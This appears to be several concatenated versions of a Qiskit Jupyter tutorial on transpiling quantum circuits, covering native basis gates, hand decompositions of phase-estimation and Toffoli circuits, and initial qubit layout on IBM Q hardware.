backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 5 and not x.configuration().simulator and x.status().operational==True))
backend.configuration().basis_gates
###Output
_____no_output_____
###Markdown
We see that our device supports five native gates: four single-qubit gates (`u1`, `u2`, `u3`, and `id`) and one two-qubit entangling gate `cx`. In addition, the device supports qubit measurements (otherwise we cannot read out an answer!). Although we have queried only a single device, all IBM Q devices support this gate set. The `u*` gates represent arbitrary single-qubit rotations of one, two, and three angles. The `u1` gates are single-parameter rotations that represent generalized phase gates of the form $$U_{1}(\lambda) = \begin{bmatrix}1 & 0 \\0 & e^{i\lambda}\end{bmatrix}$$ This set includes common gates such as $Z$, $T$, $T^{\dagger}$, $S$, and $S^{\dagger}$. It turns out that these gates do not actually need to be performed on hardware, but instead, can be implemented in software as "virtual gates". These virtual gates are called "frame changes", take zero time, and have no associated error; they are free gates on hardware. Two-angle rotations, $U_{2}(\phi,\lambda)$, are actually two frame changes with a single $X_{\pi/2}$ gate in between them, and can be used to synthesize gates like the Hadamard ($U_{2}(0,\pi)$) gate. As the only actual gate performed is the $X_{\pi/2}$ gate, the error and gate time associated with any $U_{2}$ gate is the same as for an $X_{\pi/2}$ gate. Similarly, $U_{3}(\theta,\phi,\lambda)$ gates are formed from three frame changes with two $X_{\pi/2}$ gates in between them. The errors and gate times are twice those of a single $X_{\pi/2}$. The identity gate, $id$, is straightforward: it is a placeholder gate with a fixed time interval. The only entangling gate supported by the IBM Q devices is the CNOT gate (`cx`), which, in the computational basis, can be written as $$\mathrm{CNOT}(0,1) = \begin{bmatrix}1 & 0 & 0 & 0 \\0 & 0 & 0 & 1 \\0 & 0 & 1 & 0 \\0 & 1 & 0 & 0\end{bmatrix}$$ where we see that the matrix form follows from the specific bit-ordering convention used in Qiskit. Every quantum circuit run on an IBM Q device must be expressed using only these basis gates. For example, suppose one wants to run a simple phase estimation circuit:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.x(qr[1])
qc.cu1(np.pi/4, qr[0], qr[1])
qc.h(qr[0])
qc.measure(qr[0], cr[0])
qc.draw(output='mpl')
###Output
_____no_output_____
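###Markdown
Before rewriting this circuit by hand, it is worth convincing yourself of the claim above that the Hadamard is just $U_{2}(0,\pi)$. Here is a minimal sketch using `qiskit.quantum_info.Operator` (it assumes a Qiskit version where `Operator.equiv` and the legacy `u2` method are available):
###Code
from qiskit.quantum_info import Operator
h_circ = QuantumCircuit(1)
h_circ.h(0)
u2_circ = QuantumCircuit(1)
u2_circ.u2(0, np.pi, 0)
# equiv() compares the two unitaries up to a global phase
print(Operator(h_circ).equiv(Operator(u2_circ)))
###Output
_____no_output_____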
###Markdown
We have $H$, $X$, and controlled-$U_{1}$ gates, none of which is in our device's basis gate set, so they must be expanded. We will see that this expansion is taken care of for you, but for now let us just rewrite the circuit in the basis gate set:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc_basis = QuantumCircuit(qr, cr)
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
# X gate in U3 format
qc_basis.u3(np.pi, 0, np.pi, qr[1])
# Decomposition for controlled-U1 with lambda=pi/4
qc_basis.u1(np.pi/8, qr[0])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(-np.pi/8, qr[1])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/8, qr[1])
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
qc_basis.measure(qr[0], cr[0])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
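###Markdown
The same expansion can also be produced automatically. Below is a short sketch that passes an explicit `basis_gates` list to Qiskit's `transpile` function; the resulting gate counts may differ slightly from the hand decomposition above, since the transpiler also applies light optimizations by default.
###Code
from qiskit import transpile
# Unroll the original phase-estimation circuit into the device basis gates
qc_unrolled = transpile(qc, basis_gates=['u1', 'u2', 'u3', 'id', 'cx'])
qc_unrolled.draw(output='mpl')
###Output
_____no_output_____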
###Markdown
A few things to highlight. One, the circuit has gotten longer with respect to the initial one. This can be verified by checking the depth of the circuits:
###Code
print(qc.depth(), ',', qc_basis.depth())
###Output
4 , 7
###Markdown
Second, although we had a single controlled gate, the fact that it was not in the basis set means that, when expanded, it requires more than a single `cx` gate to implement. All said, unrolling to the basis set of gates leads to an increase in the length of a quantum circuit and the number of gates. Both of these increases lead to more errors from the environment and gate errors, respectively, and further circuit rewriting steps must try to mitigate this effect through circuit optimizations. Finally, we will look at the particularly important example of a Toffoli, or controlled-controlled-not gate:
###Code
qr = QuantumRegister(3, 'q')
qc = QuantumCircuit(qr)
qc.ccx(qr[0], qr[1], qr[2])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
As a three-qubit gate, it should already be clear that this is not in the basis set of our devices. We have already seen that controlled gates not in the basis set are typically decomposed into multiple CNOT gates. This is doubly true for controlled gates with more than two qubits, where multiple CNOT gates are needed to implement the entangling across the multiple qubits. In our basis set, the Toffoli gate can be written as:
###Code
qr = QuantumRegister(3, 'q')
qc_basis = QuantumCircuit(qr)
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(np.pi/4, qr[1])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.u1(np.pi/4, qr[0])
qc_basis.u1(-np.pi/4, qr[1])
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
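###Markdown
You can confirm the cost of this decomposition programmatically with `QuantumCircuit.count_ops`; a one-line sketch:
###Code
# Tally the gates in the hand-decomposed Toffoli; expect six 'cx' entries plus single-qubit gates
print(qc_basis.count_ops())
###Output
_____no_output_____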
###Markdown
Therefore, for every Toffoli gate in a quantum circuit, the IBM Q hardware must execute six CNOT gates and a handful of single-qubit gates. From this example, it should be clear that any algorithm that makes use of multiple Toffoli gates will end up as a circuit with large depth and will therefore be appreciably affected by noise and gate errors. Initial Layout
###Code
qr = QuantumRegister(5, 'q')
cr = ClassicalRegister(5, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.cx(qr[0], qr[4])
qc.cx(qr[4], qr[3])
qc.cx(qr[3], qr[1])
qc.cx(qr[1], qr[2])
qc.draw(output='mpl')
from qiskit.visualization.gate_map import plot_gate_map
plot_gate_map(backend, plot_directed=True)
import qiskit
qiskit.__qiskit_version__
###Output
_____no_output_____
###Markdown
Transpiling Quantum Circuits In this chapter we will investigate how quantum circuits are transformed when run on quantum devices. That we need to modify the circuits at all is a consequence of the limitations of current quantum computing hardware. Namely, the limited connectivity inherent in most quantum hardware, restricted gate sets, as well as environmental noise and gate errors, all conspire to limit the effective computational power on today's quantum devices. Fortunately, quantum circuit rewriting tool chains have been developed that directly address these issues, and return heavily optimized circuits mapped to targeted quantum devices. Here we will explore the IBM Qiskit 'transpiler' circuit rewriting framework.
###Code
import numpy as np
from qiskit import *
from qiskit.tools.jupyter import *
from qiskit.providers.ibmq import least_busy
%matplotlib inline
IBMQ.load_account()
###Output
_____no_output_____
###Markdown
Core Steps in Circuit Rewriting As we will see, rewriting quantum circuits to match hardware constraints and optimize for performance can be far from trivial. The flow of logic in the rewriting tool chain need not be linear, and can often have iterative sub-loops, conditional branches, and other complex behaviors. That being said, the basic building blocks follow the structure given below. Our goal in this section is to see what each of these "passes" does at a high-level, and then begin exploring their usage on a set of common circuits. Unrolling to Basis Gates When writing a quantum circuit you are free to use any quantum gate (unitary operator) that you like, along with a collection of non-gate operations such as qubit measurements and reset operations. However, when running a circuit on a real quantum device one no longer has this flexibility. Due to limitations in, for example, the physical interactions between qubits, difficulty in implementing multi-qubit gates, control electronics etc, a quantum computing device can only natively support a handful of quantum gates and non-gate operations. In the present case of IBM Q devices, the native gate set can be found by querying the devices themselves:
###Code
provider = IBMQ.get_provider(group='open')
provider.backends(simulator=False)
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 5 and not x.configuration().simulator and x.status().operational==True))
backend.configuration().basis_gates
###Output
_____no_output_____
###Markdown
We see that the our device supports five native gates: three single-qubit gates (`u1`, `u2`, `u3`, and `id`) and one two-qubit entangling gate `cx`. In addition, the device supports qubit measurements (otherwise we can not read out an answer!). Although we have queried only a single device, all IBM Q devices support this gate set.The `u*` gates represent arbitrary single-qubit rotations of one, two, and three angles. The `u1` gates are single-parameter rotations that represent generalized phase gates of the form$$U_{1}(\lambda) = \begin{bmatrix}1 & 0 \\0 & e^{i\lambda}\end{bmatrix}$$This set includes common gates such as $Z$, $T$, $T^{\dagger}$, $S$, and $S^{\dagger}$. It turns out that these gates do not actually need to be performed on hardware, but instead, can be implemented in software as "virtual gates". These virtual gates are called "frame changes" and take zero time, and have no associated error; they are free gates on hardware.Two-angle rotations, $U_{2}(\phi,\lambda)$, are actually two frame changes with a single $X_{\pi/2}$ gate in between them, and can be used to synthesize gates like the Hadamard ($U_{2}(0,\pi)$) gate. As the only actual gate performed is the $X_{\pi/2}$ gate, the error and gate time associated with any $U_{2}$ gate is the same as an $X_{\pi/2}$ gate. Similarly, $U_{3}(\theta,\phi,\lambda)$ gates are formed from three frame changes with two $X_{\pi/2}$ gates in between them. The errors and gate times are twice those of a single $X_{\pi/2}$. The identity gate, $id$, is straightforward, and is a placeholder gate with a fixed time-interval. The only entangling gate supported by the IBM Q devices is the CNOT gate (`cx`) that, in the computational basis, can be written as:$$\mathrm{CNOT}(0,1) = \begin{bmatrix}1 & 0 & 0 & 0 \\0 & 0 & 0 & 1 \\0 & 0 & 1 & 0 \\0 & 1 & 0 & 0\end{bmatrix}$$,where we see that the matrix form follows from the specific bit-ordering convention used in Qiskit. Every quantum circuit run on a IBM Q device must be expressed using only these basis gates. For example, suppose one wants to run a simple phase estimation circuit:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.x(qr[1])
qc.cu1(np.pi/4, qr[0], qr[1])
qc.h(qr[0])
qc.measure(qr[0], cr[0])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
We have $H$, $X$, and controlled-$U_{1}$ gates, none of which is in our device's basis gate set, so they must be expanded. We will see that this expansion is taken care of for you, but for now let us just rewrite the circuit in the basis gate set:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc_basis = QuantumCircuit(qr, cr)
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
# X gate in U3 format
qc_basis.u3(np.pi, 0, np.pi, qr[1])
# Decomposition for controlled-U1 with lambda=pi/4
qc_basis.u1(np.pi/8, qr[0])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(-np.pi/8, qr[1])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/8, qr[1])
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
qc_basis.measure(qr[0], cr[0])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
A few things to highlight. One, the circuit has gotten longer with respect to the initial one. This can be verified by checking the depth of the circuits:
###Code
print(qc.depth(), ',', qc_basis.depth())
###Output
4 , 7
###Markdown
Second, although we had a single controlled gate, the fact that it was not in the basis set means that, when expanded, it requires more than a single `cx` gate to implement. All said, unrolling to the basis set of gates leads to an increase in the length of a quantum circuit and the number of gates. Both of these increases lead to more errors from the environment and gate errors, respectively, and further circuit rewriting steps must try to mitigate this effect through circuit optimizations. Finally, we will look at the particularly important example of a Toffoli, or controlled-controlled-not gate:
###Code
qr = QuantumRegister(3, 'q')
qc = QuantumCircuit(qr)
qc.ccx(qr[0], qr[1], qr[2])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
As a three-qubit gate, it should already be clear that this is not in the basis set of our devices. We have already seen that controlled gates not in the basis set are typically decomposed into multiple CNOT gates. This is doubly true for controlled gates with more than two qubits, where multiple CNOT gates are needed to implement the entangling across the multiple qubits. In our basis set, the Toffoli gate can be written as:
###Code
qr = QuantumRegister(3, 'q')
qc_basis = QuantumCircuit(qr)
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(np.pi/4, qr[1])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.u1(np.pi/4, qr[0])
qc_basis.u1(-np.pi/4, qr[1])
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
Therefore, for every Toffoli gate in a quantum circuit, the IBM Q hardware must execute six CNOT gates and a handful of single-qubit gates. From this example, it should be clear that any algorithm that makes use of multiple Toffoli gates will end up as a circuit with large depth and will therefore be appreciably affected by noise and gate errors. Initial Layout
###Code
qr = QuantumRegister(5, 'q')
cr = ClassicalRegister(5, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.cx(qr[0], qr[4])
qc.cx(qr[4], qr[3])
qc.cx(qr[3], qr[1])
qc.cx(qr[1], qr[2])
qc.draw(output='mpl')
from qiskit.visualization.gate_map import plot_gate_map
plot_gate_map(backend, plot_directed=True)
###Output
_____no_output_____
###Markdown
Transpiling Quantum Circuits In this chapter we will investigate how quantum circuits are transformed when run on quantum devices. That we need to modify the circuits at all is a consequence of the limitations of current quantum computing hardware. Namely, the limited connectivity inherent in most quantum hardware, restricted gate sets, as well as environmental noise and gate errors, all conspire to limit the effective computational power on today's quantum devices. Fortunately, quantum circuit rewriting tool chains have been developed that directly address these issues, and return heavily optimized circuits mapped to targeted quantum devices. Here we will explore the IBM Qiskit 'transpiler' circuit rewriting framework.
###Code
import numpy as np
from qiskit import *
from qiskit.tools.jupyter import *
from qiskit.providers.ibmq import least_busy
%matplotlib inline
%config InlineBackend.figure_format = 'svg' # Makes the images look nice
IBMQ.load_account()
###Output
_____no_output_____
###Markdown
Core Steps in Circuit Rewriting As we will see, rewriting quantum circuits to match hardware constraints and optimize for performance can be far from trivial. The flow of logic in the rewriting tool chain need not be linear, and can often have iterative sub-loops, conditional branches, and other complex behaviors. That being said, the basic building blocks follow the structure given below.  Our goal in this section is to see what each of these "passes" does at a high-level, and then begin exploring their usage on a set of common circuits. Unrolling to Basis Gates When writing a quantum circuit you are free to use any quantum gate (unitary operator) that you like, along with a collection of non-gate operations such as qubit measurements and reset operations. However, when running a circuit on a real quantum device one no longer has this flexibility. Due to limitations in, for example, the physical interactions between qubits, difficulty in implementing multi-qubit gates, control electronics etc, a quantum computing device can only natively support a handful of quantum gates and non-gate operations. In the present case of IBM Q devices, the native gate set can be found by querying the devices themselves:
###Code
provider = IBMQ.get_provider(group='open')
provider.backends(simulator=False)
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 5 and not x.configuration().simulator and x.status().operational==True))
backend.configuration().basis_gates
###Output
_____no_output_____
###Markdown
We see that the our device supports five native gates: three single-qubit gates (`u1`, `u2`, `u3`, and `id`) and one two-qubit entangling gate `cx`. In addition, the device supports qubit measurements (otherwise we can not read out an answer!). Although we have queried only a single device, all IBM Q devices support this gate set.The `u*` gates represent arbitrary single-qubit rotations of one, two, and three angles. The `u1` gates are single-parameter rotations that represent generalized phase gates of the form$$U_{1}(\lambda) = \begin{bmatrix}1 & 0 \\0 & e^{i\lambda}\end{bmatrix}$$This set includes common gates such as $Z$, $T$, $T^{\dagger}$, $S$, and $S^{\dagger}$. It turns out that these gates do not actually need to be performed on hardware, but instead, can be implemented in software as "virtual gates". These virtual gates are called "frame changes" and take zero time, and have no associated error; they are free gates on hardware.Two-angle rotations, $U_{2}(\phi,\lambda)$, are actually two frame changes with a single $X_{\pi/2}$ gate in between them, and can be used to synthesize gates like the Hadamard ($U_{2}(0,\pi)$) gate. As the only actual gate performed is the $X_{\pi/2}$ gate, the error and gate time associated with any $U_{2}$ gate is the same as an $X_{\pi/2}$ gate. Similarly, $U_{3}(\theta,\phi,\lambda)$ gates are formed from three frame changes with two $X_{\pi/2}$ gates in between them. The errors and gate times are twice those of a single $X_{\pi/2}$. The identity gate, $id$, is straightforward, and is a placeholder gate with a fixed time-interval. The only entangling gate supported by the IBM Q devices is the CNOT gate (`cx`) that, in the computational basis, can be written as:$$\mathrm{CNOT}(0,1) = \begin{bmatrix}1 & 0 & 0 & 0 \\0 & 0 & 0 & 1 \\0 & 0 & 1 & 0 \\0 & 1 & 0 & 0\end{bmatrix}$$,where we see that the matrix form follows from the specific bit-ordering convention used in Qiskit. Every quantum circuit run on a IBM Q device must be expressed using only these basis gates. For example, suppose one wants to run a simple phase estimation circuit:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.x(qr[1])
qc.cp(np.pi/4, qr[0], qr[1])
qc.h(qr[0])
qc.measure(qr[0], cr[0])
qc.draw()
###Output
_____no_output_____
###Markdown
We have $H$, $X$, and controlled-$U_{1}$ gates, none of which is in our device's basis gate set, so they must be expanded. We will see that this expansion is taken care of for you, but for now let us just rewrite the circuit in the basis gate set:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc_basis = QuantumCircuit(qr, cr)
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
# X gate in U3 format
qc_basis.u3(np.pi, 0, np.pi, qr[1])
# Decomposition for controlled-phase with lambda=pi/4
qc_basis.p(np.pi/8, qr[0])
qc_basis.cx(qr[0], qr[1])
qc_basis.p(-np.pi/8, qr[1])
qc_basis.cx(qr[0], qr[1])
qc_basis.p(np.pi/8, qr[1])
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
qc_basis.measure(qr[0], cr[0])
qc_basis.draw()
###Output
/usr/local/anaconda3/lib/python3.7/site-packages/ipykernel_launcher.py:6: DeprecationWarning: The QuantumCircuit.u2 method is deprecated as of 0.16.0. It will be removed no earlier than 3 months after the release date. You can use the general 1-qubit gate QuantumCircuit.u instead: u2(φ,λ) = u(π/2, φ, λ). Alternatively, you can decompose it interms of QuantumCircuit.p and QuantumCircuit.sx: u2(φ,λ) = p(π/2+φ) sx p(λ-π/2) (1 pulse on hardware).
/usr/local/anaconda3/lib/python3.7/site-packages/ipykernel_launcher.py:8: DeprecationWarning: The QuantumCircuit.u3 method is deprecated as of 0.16.0. It will be removed no earlier than 3 months after the release date. You should use QuantumCircuit.u instead, which acts identically. Alternatively, you can decompose u3 in terms of QuantumCircuit.p and QuantumCircuit.sx: u3(ϴ,φ,λ) = p(φ+π) sx p(ϴ+π) sx p(λ) (2 pulses on hardware).
###Markdown
A few things to highlight. One, the circuit has gotten longer with respect to the initial one. This can be verified by checking the depth of the circuits:
###Code
print(qc.depth(), ',', qc_basis.depth())
###Output
4 , 7
###Markdown
Second, although we had a single controlled gate, the fact that it was not in the basis set means that, when expanded, it requires more than a single `cx` gate to implement. All said, unrolling to the basis set of gates leads to an increase in the length of a quantum circuit and the number of gates. Both of these increases lead to more errors from the environment and gate errors, respectively, and further circuit rewriting steps must try to mitigate this effect through circuit optimizations. Finally, we will look at the particularly important example of a Toffoli, or controlled-controlled-not gate:
###Code
qr = QuantumRegister(3, 'q')
qc = QuantumCircuit(qr)
qc.ccx(qr[0], qr[1], qr[2])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
As a three-qubit gate, it should already be clear that this is not in the basis set of our devices. We have already seen that controlled gates not in the basis set are typically decomposed into multiple CNOT gates. This is doubly true for controlled gates with more than two qubits, where multiple CNOT gates are needed to implement the entangling across the multiple qubits. In our basis set, the Toffoli gate can be written as:
###Code
qr = QuantumRegister(3, 'q')
qc_basis = QuantumCircuit(qr)
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.p(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.p(np.pi/4, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.p(np.pi/4, qr[1])
qc_basis.p(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.p(np.pi/4, qr[2])
qc_basis.p(np.pi/4, qr[0])
qc_basis.p(-np.pi/4, qr[1])
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.draw()
###Output
_____no_output_____
###Markdown
Therefore, for every Toffoli gate in a quantum circuit, the IBM Q hardware must execute six CNOT gates and a handful of single-qubit gates. From this example, it should be clear that any algorithm that makes use of multiple Toffoli gates will end up as a circuit with large depth and will therefore be appreciably affected by noise and gate errors. Initial Layout
###Code
qr = QuantumRegister(5, 'q')
cr = ClassicalRegister(5, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.cx(qr[0], qr[4])
qc.cx(qr[4], qr[3])
qc.cx(qr[3], qr[1])
qc.cx(qr[1], qr[2])
qc.draw(output='mpl')
from qiskit.visualization.gate_map import plot_gate_map
plot_gate_map(backend, plot_directed=True)
import qiskit.tools.jupyter
%qiskit_version_table
###Output
_____no_output_____
###Markdown
Transpiling Quantum Circuits In this chapter we will investigate how quantum circuits are transformed when run on quantum devices. That we need to modify the circuits at all is a consequence of the limitations of current quantum computing hardware. Namely, the limited connectivity inherent in most quantum hardware, restricted gate sets, as well as environmental noise and gate errors, all conspire to limit the effective computational power on today's quantum devices. Fortunately, quantum circuit rewriting tool chains have been developed that directly address these issues, and return heavily optimized circuits mapped to targeted quantum devices. Here we will explore the IBM Qiskit 'transpiler' circuit rewriting framework.
###Code
import numpy as np
from qiskit import *
from qiskit.tools.jupyter import *
from qiskit.providers.ibmq import least_busy
%matplotlib inline
%config InlineBackend.figure_format = 'svg' # Makes the images look nice
IBMQ.load_account()
###Output
_____no_output_____
###Markdown
Core Steps in Circuit Rewriting As we will see, rewriting quantum circuits to match hardware constraints and optimize for performance can be far from trivial. The flow of logic in the rewriting tool chain need not be linear, and can often have iterative sub-loops, conditional branches, and other complex behaviors. That being said, the basic building blocks follow the structure given below.  Our goal in this section is to see what each of these "passes" does at a high-level, and then begin exploring their usage on a set of common circuits. Unrolling to Basis Gates When writing a quantum circuit you are free to use any quantum gate (unitary operator) that you like, along with a collection of non-gate operations such as qubit measurements and reset operations. However, when running a circuit on a real quantum device one no longer has this flexibility. Due to limitations in, for example, the physical interactions between qubits, difficulty in implementing multi-qubit gates, control electronics etc, a quantum computing device can only natively support a handful of quantum gates and non-gate operations. In the present case of IBM Q devices, the native gate set can be found by querying the devices themselves:
###Code
provider = IBMQ.get_provider(group='open')
provider.backends(simulator=False)
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 5 and not x.configuration().simulator and x.status().operational==True))
backend.configuration().basis_gates
###Output
_____no_output_____
###Markdown
We see that the our device supports five native gates: three single-qubit gates (`u1`, `u2`, `u3`, and `id`) and one two-qubit entangling gate `cx`. In addition, the device supports qubit measurements (otherwise we can not read out an answer!). Although we have queried only a single device, all IBM Q devices support this gate set.The `u*` gates represent arbitrary single-qubit rotations of one, two, and three angles. The `u1` gates are single-parameter rotations that represent generalized phase gates of the form$$U_{1}(\lambda) = \begin{bmatrix}1 & 0 \\0 & e^{i\lambda}\end{bmatrix}$$This set includes common gates such as $Z$, $T$, $T^{\dagger}$, $S$, and $S^{\dagger}$. It turns out that these gates do not actually need to be performed on hardware, but instead, can be implemented in software as "virtual gates". These virtual gates are called "frame changes" and take zero time, and have no associated error; they are free gates on hardware.Two-angle rotations, $U_{2}(\phi,\lambda)$, are actually two frame changes with a single $X_{\pi/2}$ gate in between them, and can be used to synthesize gates like the Hadamard ($U_{2}(0,\pi)$) gate. As the only actual gate performed is the $X_{\pi/2}$ gate, the error and gate time associated with any $U_{2}$ gate is the same as an $X_{\pi/2}$ gate. Similarly, $U_{3}(\theta,\phi,\lambda)$ gates are formed from three frame changes with two $X_{\pi/2}$ gates in between them. The errors and gate times are twice those of a single $X_{\pi/2}$. The identity gate, $id$, is straightforward, and is a placeholder gate with a fixed time-interval. The only entangling gate supported by the IBM Q devices is the CNOT gate (`cx`) that, in the computational basis, can be written as:$$\mathrm{CNOT}(0,1) = \begin{bmatrix}1 & 0 & 0 & 0 \\0 & 0 & 0 & 1 \\0 & 0 & 1 & 0 \\0 & 1 & 0 & 0\end{bmatrix}$$,where we see that the matrix form follows from the specific bit-ordering convention used in Qiskit. Every quantum circuit run on a IBM Q device must be expressed using only these basis gates. For example, suppose one wants to run a simple phase estimation circuit:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.x(qr[1])
qc.cu1(np.pi/4, qr[0], qr[1])
qc.h(qr[0])
qc.measure(qr[0], cr[0])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
We have $H$, $X$, and controlled-$U_{1}$ gates, none of which is in our device's basis gate set, so they must be expanded. We will see that this expansion is taken care of for you, but for now let us just rewrite the circuit in the basis gate set:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc_basis = QuantumCircuit(qr, cr)
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
# X gate in U3 format
qc_basis.u3(np.pi, 0, np.pi, qr[1])
# Decomposition for controlled-U1 with lambda=pi/4
qc_basis.u1(np.pi/8, qr[0])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(-np.pi/8, qr[1])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/8, qr[1])
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
qc_basis.measure(qr[0], cr[0])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
A few things to highlight. One, the circuit has gotten longer with respect to the initial one. This can be verified by checking the depth of the circuits:
###Code
print(qc.depth(), ',', qc_basis.depth())
###Output
4 , 7
###Markdown
Second, although we had a single controlled gate, the fact that it was not in the basis set means that, when expanded, it requires more than a single `cx` gate to implement. All said, unrolling to the basis set of gates leads to an increase in the length of a quantum circuit and the number of gates. Both of these increases lead to more errors from the environment and gate errors, respectively, and further circuit rewriting steps must try to mitigate this effect through circuit optimizations. Finally, we will look at the particularly important example of a Toffoli, or controlled-controlled-not gate:
###Code
qr = QuantumRegister(3, 'q')
qc = QuantumCircuit(qr)
qc.ccx(qr[0], qr[1], qr[2])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
As a three-qubit gate, it should already be clear that this is not in the basis set of our devices. We have already seen that controlled gates not in the basis set are typically decomposed into multiple CNOT gates. This is doubly true for controlled gates with more than two qubits, where multiple CNOT gates are needed to implement the entangling across the multiple qubits. In our basis set, the Toffoli gate can be written as:
###Code
qr = QuantumRegister(3, 'q')
qc_basis = QuantumCircuit(qr)
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(np.pi/4, qr[1])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.u1(np.pi/4, qr[0])
qc_basis.u1(-np.pi/4, qr[1])
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
Therefore, for every Toffoli gate in a quantum circuit, the IBM Q hardware must execute six CNOT gates and a handful of single-qubit gates. From this example, it should be clear that any algorithm that makes use of multiple Toffoli gates will end up as a circuit with large depth and will therefore be appreciably affected by noise and gate errors. Initial Layout
###Code
qr = QuantumRegister(5, 'q')
cr = ClassicalRegister(5, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.cx(qr[0], qr[4])
qc.cx(qr[4], qr[3])
qc.cx(qr[3], qr[1])
qc.cx(qr[1], qr[2])
qc.draw(output='mpl')
from qiskit.visualization.gate_map import plot_gate_map
plot_gate_map(backend, plot_directed=True)
###Output
_____no_output_____
###Markdown
Transpiling Quantum Circuits In this chapter we will investigate how quantum circuits are transformed when run on quantum devices. That we need to modify the circuits at all is a consequence of the limitations of current quantum computing hardware. Namely, the limited connectivity inherent in most quantum hardware, restricted gate sets, as well as environmental noise and gate errors, all conspire to limit the effective computational power on today's quantum devices. Fortunately, quantum circuit rewriting tool chains have been developed that directly address these issues, and return heavily optimized circuits mapped to targeted quantum devices. Here we will explore the IBM Qiskit 'transpiler' circuit rewriting framework.
###Code
import numpy as np
from qiskit import *
from qiskit.tools.jupyter import *
from qiskit.providers.ibmq import least_busy
%matplotlib inline
%config InlineBackend.figure_format = 'svg' # Makes the images look nice
IBMQ.load_account()
###Output
_____no_output_____
###Markdown
